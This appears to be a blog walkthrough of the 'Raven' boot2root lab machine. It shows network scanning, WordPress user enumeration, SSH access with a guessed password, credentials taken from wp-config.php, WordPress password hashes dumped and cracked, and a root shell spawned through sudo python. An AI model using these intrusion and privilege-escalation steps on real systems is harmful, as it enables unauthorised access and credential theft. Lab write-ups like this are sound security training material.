Reven Security

Desciption:

Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on Virtual Box. Set up to use NAT networking.

As the description tells about the machine , a boot2root machine made for a beginner or an intermediate. Here I started with the normal and as usual method that is IP scan :

┌──(root💀N4TR0)-[~]
└─# netdiscover -i vboxnet0
Currently scanning: 172.16.17.0/16 | Screen View: Unique Hosts

2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 102
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
192.168.56.1 08:00:27:7e:28:b0 1 42 PCS Systemtechnik GmbH
192.168.56.4 08:00:27:e6:5b:b8 1 60 PCS Systemtechnik GmbH

After getting the IP I just started with the NMAP scan which gives us the detailed information about the services running with the respective port numbers.

┌──(root💀N4TR0)-[~]
└─# nmap -v -p- -v -A 192.168.56.4

Here I got 4 ports open that are 22, 80, 111, and the last one is 36288.

The port 36288 that is a tcp open port but when I called it on web nothing came up instead of a error page. So, steping ahead with port no. 80.

http://192.168.56.4/

Stepping toward examine each and every webpage available on the host with the source code I got the first Flag of the machine:

view-source:http://192.168.56.4/service.html
FLAG 1

Playing with the directories of the server found that wordpress is running on host machine.

Without wasting my time I scanned for the login page and the users available to log in

http://192.168.56.4l/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.56.4%2Fwordpress%2Fwp-admin%2F&reauth=1
┌──(root💀N4TR0)-[~]
└─# wpscan --url http://192.168.56.4/wordpress -e -U /usr/share/wordlists/rockyou.txt


[i] User(s) Identified:

[+] steven
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] michael
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

Here I tried to log in to the server with both the usernames and also used them as password but can’t login so tried them on SSH service with the same for login and got success with the user “michael”.

"michael:michael"

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# ssh michael@192.168.56.4
michael@192.168.56.4's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Tue Dec 22 09:03:34 2020 from 192.168.56.1
michael@Raven:~$

Here after checking directories that the normal user can access for some time I didn’t get anything but when I went in the “/var/www/” directory I found the next flag of the machine :

michael@Raven:/var/www$ cat flag2.txt 
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

Getting second flag I stepped towards the hole to get in as root but trying many ways to do so but failed after-all I stepped ahead towards the configuration files that I can access with the user “Michael” and finally I got the access to the “MySQL” service using the credentials that I got in the wp-config.php file.

root : R@v3nSecurity

michael@Raven:/var/www/html/wordpress$ mysql -u root -p

After having access to the MySQL Database I got the password of another user that is “ Steven”:

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)

Using John hash cracker to crack the hash I got the password for the user Steven that is:

Steven : pink84

michael@Raven:/var/www/html/wordpress$ su steven
Password:

Searching for the permissions if any the user can get access in as a root user and I got it in a single try:

$ sudo -l
Matching Defaults entries for steven on raven:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User steven may run the following commands on raven:
(ALL) NOPASSWD: /usr/bin/python

So the hole I got to get access to as root user is “sudo” without any password on the python service. So without wasting much time I just get into it to call the bash shell using sudo python cmd.:

$ sudo python -c 'import pty;pty.spawn("/bin/bash");'
root@Raven:/var/www/html/wordpress#
root@Raven:/var/www/html/wordpress# id
uid=0(root) gid=0(root) groups=0(root)
root@Raven:/var/www/html/wordpress# whoami
root

And finally I got the final password of the machine :

Final Flag

But in between this all I didn’t got the third flag of the machine so I again tried to get it and finally I got the flag in the blog section table that is “wp_posts” named table.

$  select * from wp_posts;
Third Flag

Enjoyed a lot while rooting the machine. Thanks @William McCann for the machine.

Hope you read and like it.

🤣🤣🤣🤣🤣🤣🤣

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store